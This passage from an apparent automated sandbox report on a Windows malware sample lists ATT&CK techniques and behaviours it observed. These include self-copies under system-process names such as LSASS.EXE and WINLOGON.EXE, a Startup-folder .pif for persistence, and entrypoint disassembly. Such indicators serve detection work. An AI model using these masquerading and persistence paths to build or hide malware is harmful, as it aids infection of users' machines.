"https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe to new location %WINDIR%\\D3_08.exe (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe to new location C:\\D3_08.exe (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.pif to new location %WINDIR%\\D3_08.exe (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.pif to new location C:\\D3_08.exe (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.pif to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.scr to new location %WINDIR%\\D3_08.exe (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.scr to new location C:\\D3_08.exe (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CopyFileA\" to copy C:\\\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.exe.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Data HAPUBWS.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"New Folder.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67E3CEFD.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67E3CC76.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SMSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67E3D138.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrD3_08.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67E3CC79.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"WINLOGON.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"services.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"shell.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.exe.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Data HAPUBWS.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Empty.pif\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"New Folder.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"CSRSS.EXE.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67E3CEFD.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67E3CC76.bin\" file has an entrypoint 